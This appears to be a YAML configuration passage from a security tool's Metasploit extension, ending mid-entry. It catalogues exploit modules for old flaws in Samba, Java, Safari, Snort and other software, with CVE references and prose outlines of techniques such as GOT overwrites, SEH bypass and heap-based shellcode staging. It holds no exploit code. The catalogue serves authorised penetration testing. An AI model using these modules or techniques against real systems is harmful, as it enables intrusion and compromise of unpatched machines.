description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in PeerCast <= v0.1216.\n\
\t\t\t\tThe vulnerability is caused due to a boundary error within the\n\
\t\t\t\thandling of URL parameters.\n\
\t\t\t"
authors:
- - CVE
- 2006-1148
- - OSVDB
- "23777"
- - BID
- "17040"
- - URL
- http://www.infigo.hr/in_focus/INFIGO-2006-03-01
path: extensions/metasploit/
class: Msf_module
msf_poptop_negative_read:
enable: true
msf: true
msf_key: linux/pptp/poptop_negative_read
name: Poptop Negative Read Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis is an exploit for the Poptop negative read overflow. This will\n\
\t\t\t\twork against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I\n\
\t\t\t\tcurrently do not have a good way to detect Poptop versions.\n\n\
\t\t\t\tThe server will by default only allow 4 concurrent manager processes\n\
\t\t\t\t(what we run our code in), so you could have a max of 4 shells at once.\n\n\
\t\t\t\tUsing the current method of exploitation, our socket will be closed\n\
\t\t\t\tbefore we have the ability to run code, preventing the use of Findsock.\n\
\t\t\t"
authors:
- - CVE
- 2003-0213
- - OSVDB
- "3293"
- - URL
- http://securityfocus.com/archive/1/317995
- - URL
- http://www.freewebs.com/blightninjas/
path: extensions/metasploit/
class: Msf_module
msf_cyrus_pop3d_popsubfolders:
enable: true
msf: true
msf_key: linux/pop3/cyrus_pop3d_popsubfolders
name: Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploit takes advantage of a stack based overflow. Once the stack\n\
\t\t\t\tcorruption has occured it is possible to overwrite a pointer which is\n\
\t\t\t\tlater used for a memcpy. This gives us a write anything anywhere condition\n\
\t\t\t\tsimilar to a format string vulnerability.\n\n\
\t\t\t\tNOTE: The popsubfolders option is a non-default setting.\n\n\
\t\t\t\tI chose to overwrite the GOT with my shellcode and return to it. This\n\
\t\t\t\tdefeats the VA random patch and possibly other stack protection features.\n\n\
\t\t\t\tTested on gentoo-sources Linux 2.6.16. Although Fedora CORE 5 ships with\n\
\t\t\t\ta version containing the vulnerable code, it is not exploitable due to the\n\
\t\t\t\tuse of the FORTIFY_SOURCE compiler enhancement\n\
\t\t\t"
authors:
- - CVE
- 2006-2502
- - OSVDB
- "25853"
- - BID
- "18056"
- - URL
- http://www.exploit-db.com/exploits/2053
- - URL
- http://www.exploit-db.com/exploits/2185
- - URL
- http://archives.neohapsis.com/archives/fulldisclosure/2006-05/0527.html
path: extensions/metasploit/
class: Msf_module
msf_madwifi_giwscan_cb:
enable: true
msf: true
msf_key: linux/madwifi/madwifi_giwscan_cb
name: Madwifi SIOCGIWSCAN Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThe Madwifi driver under Linux is vulnerable to a remote kernel-mode\n\
\t\t\t\tstack-based buffer overflow.\n\n\
\t\t\t\tThe vulnerability is triggered by one of these properly crafted\n\
\t\t\t\tinformation element: WPA, RSN, WME and Atheros OUI Current madwifi\n\
\t\t\t\tdriver (0.9.2) and and all madwifi-ng drivers since r1504 are\n\
\t\t\t\tvulnerable\n\n\
\t\t\t\tMadwifi 0.9.2.1 release corrects the issue.\n\n\
\t\t\t\tThis module has been tested against Ubuntu 6.10 and is 100% reliable,\n\
\t\t\t\tdoesn\\'t crash the Wifi stack and can exploit the same machine multiple\n\
\t\t\t\ttime without the need to reboot it.\n\n\
\t\t\t\tThis module depends on the Lorcon2 library and only works on the Linux\n\
\t\t\t\tplatform with a supported wireless card. Please see the Ruby Lorcon2\n\
\t\t\t\tdocumentation (external/ruby-lorcon/README) for more information.\n\
\t\t\t"
authors:
- - CVE
- 2006-6332
- - OSVDB
- "31267"
- - URL
- http://www.madwifi.org
path: extensions/metasploit/
class: Msf_module
msf_chain_reply:
enable: true
msf: true
msf_key: linux/samba/chain_reply
name: Samba chain_reply Memory Corruption (Linux x86)
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploits a memory corruption vulnerability present in Samba versions\n\
\t\t\t\tprior to 3.3.13. When handling chained response packets, Samba fails to validate\n\
\t\t\t\tthe offset value used when building the next part. By setting this value to a\n\
\t\t\t\tnumber larger than the destination buffer size, an attacker can corrupt memory.\n\
\t\t\t\tAdditionally, setting this value to a value smaller than 'smb_wct' (0x24) will\n\
\t\t\t\tcause the header of the input buffer chunk to be corrupted.\n\n\
\t\t\t\tAfter close inspection, it appears that 3.0.x versions of Samba are not\n\
\t\t\t\texploitable. Since they use an \"InputBuffer\" size of 0x20441, an attacker cannot\n\
\t\t\t\tcause memory to be corrupted in an exploitable way. It is possible to corrupt the\n\
\t\t\t\theap header of the \"InputBuffer\", but it didn't seem possible to get the chunk\n\
\t\t\t\tto be processed again prior to process exit.\n\n\
\t\t\t\tIn order to gain code execution, this exploit attempts to overwrite a \"talloc\n\
\t\t\t\tchunk\" destructor function pointer.\n\n\
\t\t\t\tThis particular module is capable of exploiting the flaw on x86 Linux systems\n\
\t\t\t\tthat do not have the nx memory protection.\n\n\
\t\t\t\tNOTE: It is possible to make exploitation attempts indefinitely since Samba forks\n\
\t\t\t\tfor user sessions in the default configuration.\n\
\t\t\t"
authors:
- - CVE
- 2010-2063
- - OSVDB
- "65518"
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=873
path: extensions/metasploit/
class: Msf_module
msf_snortbopre:
enable: true
msf: true
msf_key: linux/ids/snortbopre
name: Snort Back Orifice Pre-Preprocessor Remote Exploit
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the Back Orifice pre-processor module\n\
\t\t\t\tincluded with Snort versions 2.4.0, 2.4.1, 2.4.2, and 2.4.3. This vulnerability could\n\
\t\t\t\tbe used to completely compromise a Snort sensor, and would typically gain an attacker\n\
\t\t\t\tfull root or administrative privileges.\n\
\t\t\t"
authors:
- - CVE
- 2005-3252
- - OSVDB
- "20034"
- - BID
- "15131"
- - URL
- http://xforce.iss.net/xforce/alerts/id/207
path: extensions/metasploit/
class: Msf_module
msf_ut2004_secure:
enable: true
msf: true
msf_key: windows/games/ut2004_secure
name: Unreal Tournament 2004 "secure" Overflow (Win32)
category: Metasploit
description: "\n\n\
\t\t\tThis is an exploit for the GameSpy secure query in\n\
\t\t\tthe Unreal Engine.\n\n\
\t\t\tThis exploit only requires one UDP packet, which can\n\
\t\t\tbe both spoofed and sent to a broadcast address.\n\
\t\t\tUsually, the GameSpy query server listens on port 7787,\n\
\t\t\tbut you can manually specify the port as well.\n\n\
\t\t\tThe RunServer.sh script will automatically restart the\n\
\t\t\tserver upon a crash, giving us the ability to\n\
\t\t\tbruteforce the service and exploit it multiple\n\
\t\t\ttimes.\n\n\
\t\t\t"
authors:
- - CVE
- 2004-0608
- - OSVDB
- "7217"
- - BID
- "10570"
path: extensions/metasploit/
class: Msf_module
msf_upnp_location:
enable: true
msf: true
msf_key: osx/mdns/upnp_location
name: Mac OS X mDNSResponder UPnP Location Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow that occurs when processing\n\
\t\t\t\tspecially crafted requests set to mDNSResponder. All Mac OS X systems\n\
\t\t\t\tbetween version 10.4 and 10.4.9 (without the 2007-005 patch) are\n\
\t\t\t\taffected.\n\
\t\t\t"
authors:
- - OSVDB
- "35142"
- - CVE
- 2007-2386
- - BID
- "24144"
- - URL
- http://support.apple.com/kb/TA24732
path: extensions/metasploit/
class: Msf_module
msf_ufo_ai:
enable: true
msf: true
msf_key: windows/misc/ufo_ai
name: "UFO: Alien Invasion IRC Client Buffer Overflow Exploit"
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the IRC client component of\n\
\t\t\t\tUFO: Alien Invasion 2.2.1.\n\
\t\t\t"
authors:
- - OSVDB
- "65689"
- - URL
- http://www.exploit-db.com/exploits/14013
path: extensions/metasploit/
class: Msf_module
msf_safari_libtiff:
enable: true
msf: true
msf_key: osx/armle/safari_libtiff
name: iPhone MobileSafari LibTIFF Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the version of\n\
\t\t\t\tlibtiff shipped with firmware versions 1.00, 1.01, 1.02, and\n\
\t\t\t\t1.1.1 of the Apple iPhone. iPhones which have not had the BSD\n\
\t\t\t\ttools installed will need to use a special payload.\n\
\t\t\t"
authors:
- - CVE
- 2006-3459
- - OSVDB
- "27723"
- - BID
- "19283"
path: extensions/metasploit/
class: Msf_module
msf_safari_metadata_archive:
enable: true
msf: true
msf_key: osx/browser/safari_metadata_archive
name: Safari Archive Metadata Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in Safari's \"Safe file\" feature, which will\n\
\t\t\t\tautomatically open any file with one of the allowed extensions. This can be abused\n\
\t\t\t\tby supplying a zip file, containing a shell script, with a metafile indicating\n\
\t\t\t\tthat the file should be opened by Terminal.app. This module depends on\n\
\t\t\t\tthe 'zip' command-line utility.\n\
\t\t\t"
authors:
- - CVE
- 2006-0848
- - OSVDB
- "23510"
- - BID
- "16736"
path: extensions/metasploit/
class: Msf_module
msf_software_update:
enable: true
msf: true
msf_key: osx/browser/software_update
name: Apple OS X Software Update Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a feature in the Distribution Packages,\n\
\t\t\t\twhich are used in the Apple Software Update mechanism. This feature\n\
\t\t\t\tallows for arbitrary command execution through JavaScript. This exploit\n\
\t\t\t\tprovides the malicious update server. Requests must be redirected to\n\
\t\t\t\tthis server by other means for this exploit to work.\n\
\t\t\t"
authors:
- - CVE
- 2007-5863
- - OSVDB
- "40722"
path: extensions/metasploit/
class: Msf_module
msf_webstar_ftp_user:
enable: true
msf: true
msf_key: osx/ftp/webstar_ftp_user
name: WebSTAR FTP Server USER Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the logging routine\n\
\t\t\t\tof the WebSTAR FTP server. Reliable code execution is\n\
\t\t\t\tobtained by a series of hops through the System library.\n\
\t\t\t"
authors:
- - CVE
- 2004-0695
- - OSVDB
- "7794"
- - BID
- "10720"
path: extensions/metasploit/
class: Msf_module
msf_loginext:
enable: true
msf: true
msf_key: osx/afp/loginext
name: AppleFileServer LoginExt PathName Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the AppleFileServer service\n\
\t\t\t\ton MacOS X. This vulnerability was originally reported by Atstake and\n\
\t\t\t\twas actually one of the few useful advisories ever published by that\n\
\t\t\t\tcompany. You only have one chance to exploit this bug.\n\
\t\t\t\tThis particular exploit uses a stack-based return address that will\n\
\t\t\t\tonly work under optimal conditions.\n\
\t\t\t"
authors:
- - CVE
- 2004-0430
- - OSVDB
- "5762"
- - BID
- "10271"
path: extensions/metasploit/
class: Msf_module
msf_evocam_webserver:
enable: true
msf: true
msf_key: osx/http/evocam_webserver
name: MacOS X EvoCam HTTP GET Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the web server provided with the EvoCam\n\
\t\t\t\tprogram for Mac OS X. We use Dino Dai Zovi's exec-from-heap technique to copy the payload\n\
\t\t\t\tfrom the non-executable stack segment to heap memory. Vulnerable versions include 3.6.6,\n\
\t\t\t\t3.6.7, and possibly earlier versions as well. EvoCam version 3.6.8 fixes the vulnerablity.\n\
\t\t\t"
authors:
- - CVE
- 2010-2309
- - OSVDB
- "65043"
- - URL
- http://www.exploit-db.com/exploits/12835
path: extensions/metasploit/
class: Msf_module
msf_type77:
enable: true
msf: true
msf_key: windows/arkeia/type77
name: Arkeia Backup Client Type 77 Overflow (Win32)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the Arkeia backup\n\
\t\t\t\tclient for the Windows platform. This vulnerability affects\n\
\t\t\t\tall versions up to and including 5.3.3.\n\
\t\t\t"
authors:
- - CVE
- 2005-0491
- - OSVDB
- "14011"
- - BID
- "12594"
- - URL
- http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html
path: extensions/metasploit/
class: Msf_module
msf_quicktime_rtsp_content_type:
enable: true
msf: true
msf_key: osx/rtsp/quicktime_rtsp_content_type
name: MacOS X QuickTime RTSP Content-Type Overflow
category: Metasploit
description: No module description
authors:
- - CVE
- 2007-6166
- - OSVDB
- "40876"
- - BID
- "26549"
path: extensions/metasploit/
class: Msf_module
msf_mailapp_image_exec:
enable: true
msf: true
msf_key: osx/email/mailapp_image_exec
name: Mail.app Image Attachment Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a command execution vulnerability in the\n\
\t\t\t\tMail.app application shipped with Mac OS X 10.5.0. This flaw was\n\
\t\t\t\tpatched in 10.4 in March of 2007, but reintroduced into the final\n\
\t\t\t\trelease of 10.5.\n\
\t\t\t"
authors:
- - CVE
- 2006-0395
- - CVE
- 2007-6165
- - OSVDB
- "40875"
- - BID
- "26510"
- - BID
- "16907"
path: extensions/metasploit/
class: Msf_module
msf_mobilemail_libtiff:
enable: true
msf: true
msf_key: osx/email/mobilemail_libtiff
name: iPhone MobileMail LibTIFF Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the version of\n\
\t\t\t\tlibtiff shipped with firmware versions 1.00, 1.01, 1.02, and\n\
\t\t\t\t1.1.1 of the Apple iPhone. iPhones which have not had the BSD\n\
\t\t\t\ttools installed will need to use a special payload.\n\
\t\t\t"
authors:
- - CVE
- 2006-3459
- - OSVDB
- "27723"
- - BID
- "19283"
path: extensions/metasploit/
class: Msf_module
msf_manyargs:
enable: true
msf: true
msf_key: dialup/multi/login/manyargs
name: System V Derived /bin/login Extraneous Arguments Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploit connects to a system's modem over dialup and exploits\n\
\t\t\t\ta buffer overlflow vulnerability in it's System V derived /bin/login.\n\
\t\t\t\tThe vulnerability is triggered by providing a large number of arguments.\n\
\t\t\t"
authors:
- - CVE
- 2001-0797
- - OSVDB
- "690"
- - OSVDB
- "691"
- - BID
- "3681"
- - URL
- http://archives.neohapsis.com/archives/bugtraq/2002-10/0014.html
- - URL
- http://archives.neohapsis.com/archives/bugtraq/2004-12/0404.html
path: extensions/metasploit/
class: Msf_module
msf_mercantec_softcart:
enable: true
msf: true
msf_key: bsdi/softcart/mercantec_softcart
name: Mercantec SoftCart CGI Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis is an exploit for an undisclosed buffer overflow\n\
\t\t\t\tin the SoftCart.exe CGI as shipped with Mercantec's shopping\n\
\t\t\t\tcart software. It is possible to execute arbitrary code\n\
\t\t\t\tby passing a malformed CGI parameter in an HTTP GET\n\
\t\t\t\trequest. This issue is known to affect SoftCart version\n\
\t\t\t\t4.00b.\n\
\t\t\t"
authors:
- - CVE
- 2004-2221
- - OSVDB
- "9011"
- - BID
- "10926"
path: extensions/metasploit/
class: Msf_module
msf_hagent_untrusted_hsdata:
enable: true
msf: true
msf_key: multi/wyse/hagent_untrusted_hsdata
name: Wyse Rapport Hagent Fake Hserver Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits the Wyse Rapport Hagent service by pretending to\n\
\t\t\t\tbe a legitimate server. This process involves starting both HTTP and\n\
\t\t\t\tFTP services on the attacker side, then contacting the Hagent service of\n\
\t\t\t\tthe target and indicating that an update is available. The target will\n\
\t\t\t\tthen download the payload wrapped in an executable from the FTP service.\n\
\t\t\t"
authors:
- - CVE
- 2009-0695
- - OSVDB
- "55839"
- - US-CERT-VU
- "654545"
- - URL
- http://snosoft.blogspot.com/
- - URL
- http://www.theregister.co.uk/2009/07/10/wyse_remote_exploit_bugs/
- - URL
- http://www.wyse.com/serviceandsupport/support/WSB09-01.zip
- - URL
- http://www.wyse.com/serviceandsupport/Wyse%20Security%20Bulletin%20WSB09-01.pdf
path: extensions/metasploit/
class: Msf_module
msf_java_rmi_server:
enable: true
msf: true
msf_key: multi/misc/java_rmi_server
name: Java RMI Server Insecure Default Configuration Java Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module takes advantage of the default configuration of the RMI Registry and\n\
\t\t\t\tRMI Activation services, which allow loading classes from any remote (HTTP) URL. As it\n\
\t\t\t\tinvokes a method in the RMI Distributed Garbage Collector which is available via every\n\
\t\t\t\tRMI endpoint, it can be used against both rmiregistry and rmid, and against most other\n\
\t\t\t\t(custom) RMI endpoints as well.\n\n\
\t\t\t\t\tNote that it does not work against Java Management Extension (JMX) ports since those do\n\
\t\t\t\tnot support remote class loading, unless another RMI endpoint is active in the same\n\
\t\t\t\tJava process.\n\
\t\t\t\t\n\
\t\t\t\t\tRMI method calls do not support or require any sort of authentication.\n\
\t\t\t"
authors:
- - URL
- http://download.oracle.com/javase/1.3/docs/guide/rmi/spec/rmi-protocol.html
path: extensions/metasploit/
class: Msf_module
msf_wireshark_lwres_getaddrbyname:
enable: true
msf: true
msf_key: multi/misc/wireshark_lwres_getaddrbyname
name: Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThe LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through\n\
\t\t\t\t1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer\n\
\t\t\t\toverflow. This bug found and reported by babi.\n\n\
\t\t\t\tThis particular exploit targets the dissect_getaddrsbyname_request function. Several\n\
\t\t\t\tother functions also contain potentially exploitable stack-based buffer overflows.\n\n\
\t\t\t\tThe Windows version (of 1.2.5 at least) is compiled with /GS, which prevents\n\
\t\t\t\texploitation via the return address on the stack. Sending a larger string allows\n\
\t\t\t\texploitation using the SEH bypass method. However, this packet will usually get\n\
\t\t\t\tfragmented, which may cause additional complications.\n\n\
\t\t\t\tNOTE: The vulnerable code is reached only when the packet dissection is rendered.\n\
\t\t\t\tIf the packet is fragmented, all fragments must be captured and reassembled to\n\
\t\t\t\texploit this issue.\n\
\t\t\t"
authors:
- - CVE
- 2010-0304
- - OSVDB
- "61987"
- - BID
- "37985"
- - URL
- http://www.wireshark.org/security/wnpa-sec-2010-02.html
- - URL
- http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?view=diff&r1=31596&r2=28492&diff_format=h
path: extensions/metasploit/
class: Msf_module
msf_wireshark_lwres_getaddrbyname_loop:
enable: true
msf: true
msf_key: multi/misc/wireshark_lwres_getaddrbyname_loop
name: Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)
category: Metasploit
description: "\n\
\t\t\t\t\tThe LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through\n\
\t\t\t\t1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer\n\
\t\t\t\toverflow. This bug found and reported by babi.\n\n\
\t\t\t\tThis particular exploit targets the dissect_getaddrsbyname_request function. Several\n\
\t\t\t\tother functions also contain potentially exploitable stack-based buffer overflows.\n\n\
\t\t\t\tThe Windows version (of 1.2.5 at least) is compiled with /GS, which prevents\n\
\t\t\t\texploitation via the return address on the stack. Sending a larger string allows\n\
\t\t\t\texploitation using the SEH bypass method. However, this packet will usually get\n\
\t\t\t\tfragmented, which may cause additional complications.\n\n\
\t\t\t\tNOTE: The vulnerable code is reached only when the packet dissection is rendered.\n\
\t\t\t\tIf the packet is fragmented, all fragments must be captured and reassembled to\n\
\t\t\t\texploit this issue.\n\n\
\t\t\t\tThis version loops, sending the packet every X seconds until the job is killed.\n\
\t\t\t"
authors:
- - CVE
- 2010-0304
- - OSVDB
- "61987"
- - BID
- "37985"
- - URL
- http://www.wireshark.org/security/wnpa-sec-2010-02.html
- - URL
- http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?view=diff&r1=31596&r2=28492&diff_format=h
path: extensions/metasploit/
class: Msf_module
msf_veritas_netbackup_cmdexec:
enable: true
msf: true
msf_key: multi/misc/veritas_netbackup_cmdexec
name: VERITAS NetBackup Remote Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module allows arbitrary command execution on an\n\
\t\t\t\tephemeral port opened by Veritas NetBackup, whilst an\n\
\t\t\t\tadministrator is authenticated. The port is opened and\n\
\t\t\t\tallows direct console access as root or SYSTEM from\n\
\t\t\t\tany source address.\n\
\t\t\t"
authors:
- - CVE
- 2004-1389
- - OSVDB
- "11026"
- - BID
- "11494"
- - URL
- http://seer.support.veritas.com/docs/271727.htm
path: extensions/metasploit/
class: Msf_module
msf_openview_omniback_exec:
enable: true
msf: true
msf_key: multi/misc/openview_omniback_exec
name: HP OpenView OmniBack II Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module uses a vulnerability in the OpenView Omniback II\n\
\t\t\t\tservice to execute arbitrary commands. This vulnerability was\n\
\t\t\t\tdiscovered by DiGiT and his code was used as the basis for this\n\
\t\t\t\tmodule.\n\n\
\t\t\t\tFor Microsoft Windows targets, due to module limitations, use the\n\
\t\t\t\t\"unix/cmd/generic\" payload and set CMD to your command. You can only\n\
\t\t\t\tpass a small amount of characters (4) to the command line on Windows.\n\
\t\t\t"
authors:
- - CVE
- 2001-0311
- - OSVDB
- "6018"
- - BID
- "11032"
- - URL
- http://www.securiteam.com/exploits/6M00O150KG.html
path: extensions/metasploit/
class: Msf_module
msf_zend_java_bridge:
enable: true
msf: true
msf_key: multi/misc/zend_java_bridge
name: Zend Server Java Bridge Arbitrary Java Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module takes advantage of a trust relationship issue within the\n\
\t\t\t\tZend Server Java Bridge. The Java Bridge is responsible for handling interactions\n\
\t\t\t\tbetween PHP and Java code within Zend Server. \n\
\t\t\t\t\n\
\t\t\t\t\tWhen Java code is encountered Zend Server communicates with the Java Bridge. The\n\
\t\t\t\tJava Bridge then handles the java code and creates the objects within the Java Virtual\n\
\t\t\t\tMachine. This interaction however, does not require any sort of authentication. This\n\
\t\t\t\tleaves the JVM wide open to remote attackers. Sending specially crafted data to the\n\
\t\t\t\tJava Bridge results in the execution of arbitrary java code.\n\
\t\t\t"
authors:
- - OSVDB
- "71420"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-11-113/
- - URL
- http://www.exploit-db.com/exploits/17078/
path: extensions/metasploit/
class: Msf_module
msf_php_unserialize_zval_cookie:
enable: true
msf: true
msf_key: multi/php/php_unserialize_zval_cookie
name: PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an integer overflow vulnerability in the unserialize()\n\
\t\t\t\tfunction of the PHP web server extension. This vulnerability was patched by\n\
\t\t\t\tStefan in version 4.5.0 and applies all previous versions supporting this function.\n\
\t\t\t\tThis particular module targets numerous web applications and is based on the proof\n\
\t\t\t\tof concept provided by Stefan Esser. This vulnerability requires approximately 900k\n\
\t\t\t\tof data to trigger due the multiple Cookie headers requirement. Since we\n\
\t\t\t\tare already assuming a fast network connection, we use a 2Mb block of shellcode for\n\
\t\t\t\tthe brute force, allowing quick exploitation for those with fast networks.\n\n\
\t\t\t\tOne of the neat things about this vulnerability is that on x86 systems, the EDI register points\n\
\t\t\t\tinto the beginning of the hashtable string. This can be used with an egghunter to\n\
\t\t\t\tquickly exploit systems where the location of a valid \"jmp EDI\" or \"call EDI\" instruction\n\
\t\t\t\tis known. The EDI method is faster, but the bandwidth-intensive brute force used by this\n\
\t\t\t\tmodule is more reliable across a wider range of systems.\n\
\t\t\t"
authors:
- - CVE
- 2007-1286
- - OSVDB
- "32771"
- - URL
- http://www.php-security.org/MOPB/MOPB-04-2007.html
path: extensions/metasploit/
class: Msf_module
msf_qtjava_pointer:
enable: true
msf: true
msf_key: multi/browser/qtjava_pointer
name: Apple QTJava toQTPointer() Arbitrary Memory Access
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits an arbitrary memory access vulnerability in the\n\
\t\t\tQuicktime for Java API provided with Quicktime 7.\n\n\
\t\t\t"
authors:
- - CVE
- 2007-2175
- - OSVDB
- "34178"
- - BID
- "23608"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-07-023.html
path: extensions/metasploit/
class: Msf_module
msf_java_signed_applet:
enable: true
msf: true
msf_key: multi/browser/java_signed_applet
name: Java Signed Applet Social Engineering Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploit dynamically creates a .jar file via the\n\
\t\t\t\tMsf::Exploit::Java mixin, then signs the it. The resulting\n\
\t\t\t\tsigned applet is presented to the victim via a web page with\n\
\t\t\t\tan applet tag. The victim's JVM will pop a dialog asking if\n\
\t\t\t\tthey trust the signed applet.\n\
\t\t\t\t\n\
\t\t\t\tOn older versions the dialog will display the value of CERTCN\n\
\t\t\t\tin the \"Publisher\" line. Newer JVMs display \"UNKNOWN\" when the\n\
\t\t\t\tsignature is not trusted (i.e., it's not signed by a trusted\n\
\t\t\t\tCA). The SigningCert option allows you to provide a trusted\n\
\t\t\t\tcode signing cert, the values in which will override CERTCN.\n\
\t\t\t\tIf SigningCert is not given, a randomly generated self-signed\n\
\t\t\t\tcert will be used.\n\n\
\t\t\t\tEither way, once the user clicks \"run\", the applet executes\n\
\t\t\t\twith full user permissions.\n\
\t\t\t"
authors:
- - URL
- http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf
- - URL
- http://www.spikezilla-software.com/blog/?p=21
path: extensions/metasploit/
class: Msf_module
msf_opera_historysearch:
enable: true
msf: true
msf_key: multi/browser/opera_historysearch
name: Opera historysearch XSS
category: Metasploit
description: "\n\
\t\t\t\t\tCertain constructs are not escaped correctly by Opera's History\n\
\t\t\t\tSearch results. These can be used to inject scripts into the\n\
\t\t\t\tpage, which can then be used to modify configuration settings\n\
\t\t\t\tand execute arbitrary commands. Affects Opera versions between\n\
\t\t\t\t9.50 and 9.61.\n\
\t\t\t"
authors:
- - CVE
- 2008-4696
- - OSVDB
- "49472"
- - BID
- "31869"
- - URL
- http://www.opera.com/support/kb/view/903/
path: extensions/metasploit/
class: Msf_module
msf_java_trusted_chain:
enable: true
msf: true
msf_key: multi/browser/java_trusted_chain
name: Java Statement.invoke() Trusted Method Chain Exploit
category: Metasploit
description: "\n\
\t\t\tThis module exploits a vulnerability in Java Runtime Environment\n\
\t\t\tthat allows an untrusted method to run in a privileged context. The\n\
\t\t\tvulnerability affects version 6 prior to update 19 and version 5\n\
\t\t\tprior to update 23.\n\
\t\t\t"
authors:
- - CVE
- 2010-0840
- - OSVDB
- "63483"
- - URL
- http://slightlyrandombrokenthoughts.blogspot.com/2010/04/java-trusted-method-chaining-cve-2010.html
path: extensions/metasploit/
class: Msf_module
msf_firefox_escape_retval:
enable: true
msf: true
msf_key: multi/browser/firefox_escape_retval
name: Firefox 3.5 escape() Return Value Memory Corruption
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a memory corruption vulnerability in the Mozilla\n\
\t\t\t\tFirefox browser. This flaw occurs when a bug in the javascript interpreter\n\
\t\t\t\tfails to preserve the return value of the escape() function and results in\n\
\t\t\t\tuninitialized memory being used instead. This module has only been tested\n\
\t\t\t\ton Windows, but should work on other platforms as well with the current\n\
\t\t\t\ttargets.\n\
\t\t\t"
authors:
- - CVE
- 2009-2477
- - OSVDB
- "55846"
- - BID
- "35660"
- - URL
- https://bugzilla.mozilla.org/show_bug.cgi?id=503286
path: extensions/metasploit/
class: Msf_module
msf_opera_configoverwrite:
enable: true
msf: true
msf_key: multi/browser/opera_configoverwrite
name: Opera 9 Configuration Overwrite
category: Metasploit
description: "\n\
\t\t\t\tOpera web browser in versions <= 9.10 allows unrestricted script\n\
\t\t\t\taccess to its configuration page, opera:config, allowing an\n\
\t\t\t\tattacker to change settings and potentially execute arbitrary\n\
\t\t\t\tcode.\n\
\t\t\t"
authors:
- - OSVDB
- "66472"
path: extensions/metasploit/
class: Msf_module
msf_java_setdifficm_bof:
enable: true
msf: true
msf_key: multi/browser/java_setdifficm_bof
name: Sun Java JRE AWT setDiffICM Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a flaw in the setDiffICM function in the Sun JVM.\n\n\
\t\t\t\tThe payload is serialized and passed to the applet via PARAM tags. It must be\n\
\t\t\t\ta native payload.\n\n\
\t\t\t\tThe effected Java versions are JDK and JRE 6 Update 16 and earlier,\n\
\t\t\t\tJDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and\n\
\t\t\t\tearlier, and SDK and JRE 1.3.1_26 and earlier.\n\n\
\t\t\t\tNOTE: Although all of the above versions are reportedly vulnerable, only\n\
\t\t\t\t1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.\n\
\t\t\t"
authors:
- - CVE
- 2009-3869
- - OSVDB
- "59710"
- - BID
- "36881"
- - URL
- http://sunsolve.sun.com/search/document.do?assetkey=1-66-270474-1
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-09-078/
path: extensions/metasploit/
class: Msf_module
msf_java_calendar_deserialize:
enable: true
msf: true
msf_key: multi/browser/java_calendar_deserialize
name: Sun Java Calendar Deserialization Exploit
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a flaw in the deserialization of Calendar objects in the Sun JVM.\n\n\
\t\t\t\tThe payload can be either a native payload which is generated as an executable and\n\
\t\t\t\tdropped/executed on the target or a shell from within the Java applet in the target browser.\n\n\
\t\t\t\tThe affected Java versions are JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16\n\
\t\t\t\tand earlier, SDK and JRE 1.4.2_18 and earlier (SDK and JRE 1.3.1 are not affected).\n\
\t\t\t"
authors:
- - CVE
- 2008-5353
- - OSVDB
- "50500"
- - URL
- http://slightlyrandombrokenthoughts.blogspot.com/2008/12/calendar-bug.html
- - URL
